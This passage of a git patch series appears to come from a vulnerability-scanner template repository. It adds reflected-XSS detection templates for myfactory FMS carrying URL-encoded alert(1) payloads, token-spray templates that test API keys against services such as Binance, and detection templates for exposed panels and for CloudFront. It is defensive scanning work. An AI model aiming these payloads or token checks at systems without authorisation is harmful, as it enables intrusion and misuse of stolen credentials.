1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| optimizely | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| package | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| strava | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| cve202 | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| netlify | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| sugarcrm | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| forcepoint | 1 | | | | | | | | | +| paypal | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| graph | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| dreamweaver | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| billquick | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| wp | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| mailgun | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| square | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 35c081239b..1569a3d987 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | -| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | -| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | -| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | -| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | -| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | -| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | -| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | -| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 166 | madrobot | 63 | file | 50 | | | | | +| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 | +| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | +| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | +| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | +| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | +| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | +| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | +| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | +| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | From bbbd7909ee46a6643cdee29cf99c651e586e1f12 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 27 Oct 2021 13:25:28 +0000 Subject: [PATCH 119/145] Auto README Update [Wed Oct 27 13:25:28 UTC 2021] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index c5a55a6c3c..6885808669 100644 --- a/README.md +++ b/README.md @@ -42,16 +42,16 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | -| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | -| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | -| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | -| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | -| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | -| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | -| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | -| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 166 | madrobot | 63 | file | 50 | | | | | +| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 | +| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | +| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | +| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | +| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | +| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | +| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | +| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | +| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | **178 directories, 2459 files**. From bbe3e7b5422ce26d3aef7fca9b2a1d561deee01e Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 27 Oct 2021 20:08:59 +0530 Subject: [PATCH 120/145] Create CVE-2021-42566.yaml --- cves/2021/CVE-2021-42566.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2021/CVE-2021-42566.yaml diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42566.yaml new file mode 100644 index 0000000000..128cff7f83 --- /dev/null +++ b/cves/2021/CVE-2021-42566.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-42566 + +info: + author: madrobot + name: myfactory FMS - Reflected XSS + description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. + severity: medium + tags: cve,cve2021,myfactory,xss + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 + - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-41467 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3Cscript%3Ealert(1)%3C/script%3E' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "<script>alert(1)</script>" + part: body + condition: and + + - type: word + words: + - "text/html" + part: header From 0675ba8c679aadb25b7dd41c88a79499933a9f8e Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 27 Oct 2021 20:10:59 +0530 Subject: [PATCH 121/145] Update and rename CVE-2021-42566.yaml to CVE-2021-42565.yaml --- cves/2021/{CVE-2021-42566.yaml => CVE-2021-42565.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename cves/2021/{CVE-2021-42566.yaml => CVE-2021-42565.yaml} (88%) diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42565.yaml similarity index 88% rename from cves/2021/CVE-2021-42566.yaml rename to cves/2021/CVE-2021-42565.yaml index 128cff7f83..7d8132bf90 100644 --- a/cves/2021/CVE-2021-42566.yaml +++ b/cves/2021/CVE-2021-42565.yaml @@ -1,9 +1,9 @@ -id: CVE-2021-42566 +id: CVE-2021-42565 info: author: madrobot name: myfactory FMS - Reflected XSS - description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. + description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter. severity: medium tags: cve,cve2021,myfactory,xss reference: @@ -12,7 +12,7 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 - cve-id: CVE-2021-41467 + cve-id: CVE-2021-42565 cwe-id: CWE-79 requests: From ca73e7597402163fd6ae5ddb1ff8428fb0c2cc05 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 27 Oct 2021 20:13:56 +0530 Subject: [PATCH 122/145] Create CVE-2021-42566.yaml --- cves/2021/CVE-2021-42566.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2021/CVE-2021-42566.yaml diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42566.yaml new file mode 100644 index 0000000000..ddab6b65ba --- /dev/null +++ b/cves/2021/CVE-2021-42566.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-42566 + +info: + author: madrobot + name: myfactory FMS - Reflected XSS + description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. + severity: medium + tags: cve,cve2021,myfactory,xss + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 + - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-42566 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%27)%3Balert(1)%3B%2F%2F' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%27)%3Balert(1)%3B%2F%2F' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - ";alert(1);//" + part: body + condition: and + + - type: word + words: + - "text/html" + part: header From dedf6060102691694419b6595e01db385c53802f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 28 Oct 2021 07:14:18 +0700 Subject: [PATCH 123/145] Create cooperhewitt.yaml --- token-spray/cooperhewitt.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 token-spray/cooperhewitt.yaml diff --git a/token-spray/cooperhewitt.yaml b/token-spray/cooperhewitt.yaml new file mode 100644 index 0000000000..e848a79dae --- /dev/null +++ b/token-spray/cooperhewitt.yaml @@ -0,0 +1,19 @@ +id: api-youtube + +info: + name: Cooper Hewitt API + author: daffainfo + reference: https://collection.cooperhewitt.org/api/methods/ + severity: info + tags: token-spray + +self-contained: true +requests: + - method: GET + path: + - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" + + matchers: + - type: status + status: + - 200 From e91e2e6e27e7be1e28b278942fa1b09c1bf74dbc Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 28 Oct 2021 17:44:58 +0530 Subject: [PATCH 124/145] Added missing tag --- misconfiguration/application-yaml.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/application-yaml.yaml b/misconfiguration/application-yaml.yaml index f3f70248db..1565102728 100644 --- a/misconfiguration/application-yaml.yaml +++ b/misconfiguration/application-yaml.yaml @@ -5,6 +5,7 @@ info: author: Cristi vlad (@cristivlad25) severity: info description: Finds Application YAML files which often contain sensitive information. + tags: misconfig requests: - method: GET From d5bd05d6ab0cdb1d6822e90942eb099ce6892f99 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 28 Oct 2021 20:17:37 +0700 Subject: [PATCH 125/145] Create thecatapi.yaml --- token-spray/thecatapi.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 token-spray/thecatapi.yaml diff --git a/token-spray/thecatapi.yaml b/token-spray/thecatapi.yaml new file mode 100644 index 0000000000..fee792c413 --- /dev/null +++ b/token-spray/thecatapi.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-16278 + +info: + name: TheCatApi API Test + author: daffainfo + severity: info + reference: https://docs.thecatapi.com/ + tags: token-spray + +requests: + - raw: + - | + GET /v1/votes HTTP/1.1 + Host: {{Hostname}} + x-api-key: {{token}} + + matchers: + - type: status + negative: true + status: + - 401 From 47cddfcf0c42352a711aef9d4db621f8f02ab8aa Mon Sep 17 00:00:00 2001 From: commiter <commit@github.com> Date: Thu, 28 Oct 2021 22:28:04 +0800 Subject: [PATCH 126/145] [pulse secure VPN] add more possible paths --- exposed-panels/pulse-secure-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/pulse-secure-panel.yaml b/exposed-panels/pulse-secure-panel.yaml index 04b74a4464..7d444a4d38 100644 --- a/exposed-panels/pulse-secure-panel.yaml +++ b/exposed-panels/pulse-secure-panel.yaml @@ -10,6 +10,8 @@ requests: - method: GET path: - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" + - "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi" + - "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi" matchers-condition: or matchers: - type: word From 32a3bf9e621f50cc93d9499fa26306999de09fd7 Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Thu, 28 Oct 2021 20:54:27 +0530 Subject: [PATCH 127/145] Update thecatapi.yaml --- token-spray/thecatapi.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/token-spray/thecatapi.yaml b/token-spray/thecatapi.yaml index fee792c413..324bc31350 100644 --- a/token-spray/thecatapi.yaml +++ b/token-spray/thecatapi.yaml @@ -6,14 +6,14 @@ info: severity: info reference: https://docs.thecatapi.com/ tags: token-spray - + requests: - raw: - | GET /v1/votes HTTP/1.1 Host: {{Hostname}} x-api-key: {{token}} - + matchers: - type: status negative: true From 603d415aae6ba44c948c73b627812d97825a0a45 Mon Sep 17 00:00:00 2001 From: Jiheon <jiheon.unidev@gmail.com> Date: Fri, 29 Oct 2021 00:49:00 +0900 Subject: [PATCH 128/145] Added detect aws cloudfront service Template --- technologies/aws/aws-cloudfront-service.yaml | 22 ++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/aws/aws-cloudfront-service.yaml diff --git a/technologies/aws/aws-cloudfront-service.yaml b/technologies/aws/aws-cloudfront-service.yaml new file mode 100644 index 0000000000..97948925c1 --- /dev/null +++ b/technologies/aws/aws-cloudfront-service.yaml @@ -0,0 +1,22 @@ +id: aws-cloudfront-service + +info: + name: Detect websites using AWS cloudfront service + author: jiheon-dev + severity: info + tags: aws,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "x-cache: Hit from cloudfront" + - "x-cache: RefreshHit from cloudfront" + - "x-cache: Miss from cloudfront" + - "x-cache: Error from cloudfront" + part: header + condition: or From 3d73725652cd0bc74cd82435c4d0d9f08299e20e Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 28 Oct 2021 21:37:37 +0530 Subject: [PATCH 129/145] updated matcher to handle both cases --- technologies/aws/aws-cloudfront-service.yaml | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/technologies/aws/aws-cloudfront-service.yaml b/technologies/aws/aws-cloudfront-service.yaml index 97948925c1..539bc51605 100644 --- a/technologies/aws/aws-cloudfront-service.yaml +++ b/technologies/aws/aws-cloudfront-service.yaml @@ -1,10 +1,11 @@ id: aws-cloudfront-service info: - name: Detect websites using AWS cloudfront service + name: AWS Cloudfront service detection author: jiheon-dev severity: info tags: aws,tech + description: Detect websites using AWS cloudfront service requests: - method: GET @@ -12,11 +13,11 @@ requests: - "{{BaseURL}}" matchers: - - type: word - words: - - "x-cache: Hit from cloudfront" - - "x-cache: RefreshHit from cloudfront" - - "x-cache: Miss from cloudfront" - - "x-cache: Error from cloudfront" + - type: dsl part: header condition: or + dsl: + - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" \ No newline at end of file From b8c59421e3da336e5b0f5cf16f790690a5191915 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 28 Oct 2021 21:39:14 +0530 Subject: [PATCH 130/145] removed unwanted part --- technologies/aws/aws-cloudfront-service.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/technologies/aws/aws-cloudfront-service.yaml b/technologies/aws/aws-cloudfront-service.yaml index 539bc51605..c7241b09d8 100644 --- a/technologies/aws/aws-cloudfront-service.yaml +++ b/technologies/aws/aws-cloudfront-service.yaml @@ -14,7 +14,6 @@ requests: matchers: - type: dsl - part: header condition: or dsl: - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" From 2c74326911e591de9af35f7e793d7a8bfd3dd878 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 28 Oct 2021 21:42:39 +0530 Subject: [PATCH 131/145] misc update --- exposed-panels/pulse-secure-panel.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposed-panels/pulse-secure-panel.yaml b/exposed-panels/pulse-secure-panel.yaml index 7d444a4d38..33fe8a1e43 100644 --- a/exposed-panels/pulse-secure-panel.yaml +++ b/exposed-panels/pulse-secure-panel.yaml @@ -12,14 +12,16 @@ requests: - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" - "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi" - "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi" + + stop-at-first-match: true matchers-condition: or matchers: - type: word + part: header words: - "/dana-na/auth/welcome.cgi" - part: header - type: regex + part: body regex: - "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css" - part: body \ No newline at end of file From fa551b2be636f93b9185a1bc434bd6859abb8d07 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 28 Oct 2021 22:08:36 +0530 Subject: [PATCH 132/145] Update and rename thecatapi.yaml to api-thecatapi.yaml --- .../{thecatapi.yaml => api-thecatapi.yaml} | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) rename token-spray/{thecatapi.yaml => api-thecatapi.yaml} (54%) diff --git a/token-spray/thecatapi.yaml b/token-spray/api-thecatapi.yaml similarity index 54% rename from token-spray/thecatapi.yaml rename to token-spray/api-thecatapi.yaml index 324bc31350..f8399778d8 100644 --- a/token-spray/thecatapi.yaml +++ b/token-spray/api-thecatapi.yaml @@ -1,18 +1,19 @@ -id: CVE-2019-16278 +id: api-thecatapi info: name: TheCatApi API Test author: daffainfo severity: info reference: https://docs.thecatapi.com/ - tags: token-spray + tags: token-spray,thecatapi +self-contained: true requests: - - raw: - - | - GET /v1/votes HTTP/1.1 - Host: {{Hostname}} - x-api-key: {{token}} + - method: GET + path: + - "https://api.thecatapi.com/v1/votes" + headers: + x-api-key: "{{token}}" matchers: - type: status From 315e76f9ee8bf325f72e6d949c7da53965d2e911 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 28 Oct 2021 22:13:40 +0530 Subject: [PATCH 133/145] Update and rename cooperhewitt.yaml to api-cooperhewitt.yaml --- token-spray/{cooperhewitt.yaml => api-cooperhewitt.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename token-spray/{cooperhewitt.yaml => api-cooperhewitt.yaml} (86%) diff --git a/token-spray/cooperhewitt.yaml b/token-spray/api-cooperhewitt.yaml similarity index 86% rename from token-spray/cooperhewitt.yaml rename to token-spray/api-cooperhewitt.yaml index e848a79dae..339f8ed1b2 100644 --- a/token-spray/cooperhewitt.yaml +++ b/token-spray/api-cooperhewitt.yaml @@ -1,11 +1,11 @@ -id: api-youtube +id: api-cooperhewitt info: name: Cooper Hewitt API author: daffainfo - reference: https://collection.cooperhewitt.org/api/methods/ severity: info - tags: token-spray + reference: https://collection.cooperhewitt.org/api/methods/ + tags: token-spray,cooperhewitt self-contained: true requests: From 3f72d6e58d672a24383bd665e3b94ceb763628f5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 28 Oct 2021 13:37:43 -0500 Subject: [PATCH 134/145] Create binance-rest-api.yaml --- token-spray/binance-rest-api.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 token-spray/binance-rest-api.yaml diff --git a/token-spray/binance-rest-api.yaml b/token-spray/binance-rest-api.yaml new file mode 100644 index 0000000000..fcacd484de --- /dev/null +++ b/token-spray/binance-rest-api.yaml @@ -0,0 +1,25 @@ +id: binance-rest-api + +info: + name: Binance REST API Test + author: geeknik + severity: info + reference: https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md + tags: token-spray,binance + +self-contained: true +requests: + - method: GET + path: + - "https://api.binance.com/api/v3/historicalTrades" + headers: + X-MBX-APIKEY: "{{token}}" + + matchers: + - type: word + part: body + words: + - "Invalid API-key" + - "key format invalid" + condition: or + negative: true From 263fb400e966f4cb66d8ecca628f4b799955e62d Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 29 Oct 2021 00:22:29 +0530 Subject: [PATCH 135/145] Update CVE-2021-42566.yaml --- cves/2021/CVE-2021-42566.yaml | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-42566.yaml b/cves/2021/CVE-2021-42566.yaml index ddab6b65ba..b8266aa918 100644 --- a/cves/2021/CVE-2021-42566.yaml +++ b/cves/2021/CVE-2021-42566.yaml @@ -1,25 +1,25 @@ id: CVE-2021-42566 info: - author: madrobot name: myfactory FMS - Reflected XSS - description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. + author: madrobot severity: medium - tags: cve,cve2021,myfactory,xss + description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566 - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + - 